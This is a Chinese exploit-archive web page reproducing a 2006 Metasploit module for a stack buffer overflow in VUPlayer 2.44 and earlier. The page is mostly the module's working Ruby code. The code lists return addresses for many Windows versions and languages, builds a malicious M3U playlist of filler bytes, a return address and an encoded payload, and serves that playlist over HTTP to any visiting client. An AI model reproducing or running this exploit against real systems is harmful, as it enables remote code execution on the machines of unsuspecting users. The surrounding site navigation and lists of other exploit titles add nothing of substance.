首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VUPlayer <= 2.44 (M3U UNC Name) Buffer Overflow Exploit (meta)
来源:GLinares.code@gmail.com 作者:Greg 发布时间:2006-12-01  

require 'msf/core'

module Msf

class Exploits::Windows::Browser::VUPlayer_M3U < Msf::Exploit::Remote

include Exploit::Remote::HttpServer::Html

def initialize(info = {})
super(update_info(info,
'Name' => 'VUPlayer <= 2.44 M3U UNC Name Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in VUPlayer 2.44 and lower.
The vulnerability is caused due to a boundary error within
the parsing of playlists containing an overly entries.
After overwriting EIP with our return address, ESP stores our exploit.
This module uses the M3U file format. Original Discovery was by Greg Linares
Expanders wrote the first PoC in C format.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Greg Linares', # initial discovery and this metasploit module
'Expanders', # wrote the original POC code
],
'Version' => '$Revision: 1.0.0 $',
'References' =>
[
[ 'Email', 'GLinares.code@gmail.com'],
[ 'Email', 'Expanders@gmail.com'],

],

'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Universal v2.44 and Lower - Bass.dll', { 'Ret' => 0x10010c3b } ],
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x77db41bc } ],
[ 'Windows 2003 SP0 and SP1 English', { 'Ret' => 0x77d74adc } ],
[ 'Windows 2000 Pro English SP4', { 'Ret' => 0x77e14c29 } ],
[ 'Windows XP Pro SP2 French', { 'Ret' => 0x77d8519f } ],
[ 'Windows XP Pro SP2 German', { 'Ret' => 0x77d873a0 } ],
[ 'Windows XP Pro SP2 Italian', { 'Ret' => 0x77d873a0 } ],
[ 'Windows XP Pro SP2 Spainish', { 'Ret' => 0x77d9932f } ],
[ 'Windows XP Pro SP2 Dutch', { 'Ret' => 0x77d873a0 } ],
[ 'Windows XP Pro SP2 Polish', { 'Ret' => 0x77d873a0 } ],
[ 'Windows 2000 Pro French SP4', { 'Ret' => 0x77e04c29 } ],
[ 'Windows 2000 Pro Italian SP4', { 'Ret' => 0x77e04c29 } ],
[ 'Windows 2000 Pro German SP4', { 'Ret' => 0x77e04c29 } ],
[ 'Windows 2000 Pro Polish SP4', { 'Ret' => 0x77e04c29 } ],
[ 'Windows 2000 Pro Dutch SP4', { 'Ret' => 0x77e04c29 } ],
[ 'Windows 2000 Pro Spainish SP4', { 'Ret' => 0x77e04c29 } ],
[ 'Windows 2000 Server French SP4', { 'Ret' => 0x77df4c29 } ],
[ 'Windows 2000 Server Italian SP4', { 'Ret' => 0x77df4c29 } ],
[ 'Windows 2000 Server Chineese SP4', { 'Ret' => 0x77df4c29 } ],


],
'Privileged' => false,
'DisclosureDate' => 'Nov 29 2006',
'DefaultTarget' => 0))
end

def autofilter
false
end

def on_request_uri(client, request)
# Re-generate the payload
return if ((p = regenerate_payload(client)) == nil)

title = Rex::Text.rand_text_alpha_upper(8)


sploit = Rex::Text.rand_text_alpha_upper(1012) + [ target.ret ].pack('V')
sploit << payload.encoded

# Build the PLS Exploit
content = "#EXTM3U\r\n#EXTINF:8,#{title}"
content << "\r\n" + sploit
content << "\r\n"

print_status("Sending exploit to #{client.peerhost}:#{client.peerport}...")

# Transmit the response to the client
send_response(client, content)
end

end
end



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Serendipity <= 1.0.3 (comme
·VUPlayer <= 2.44 (M3U UNC N
·PHPGraphy 0.9.12 Privilege Esc
·AtomixMP3 <= 2.3 Malformed
·Acer LunchApp.APlunch (ActiveX
·NetBSD FTPd / tnftpd (NLST) Re
·3Com TFTP Service <= 2.0.1
·BlazeVideo HDTV Player <= 2
·Exploits 3CTftpSvc Server 2.0.
·MS Windows spoolss GetPrinterD
·AT-TFTP Buffer Overflow (Long
·awrate.com Message Board 1.0 (
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved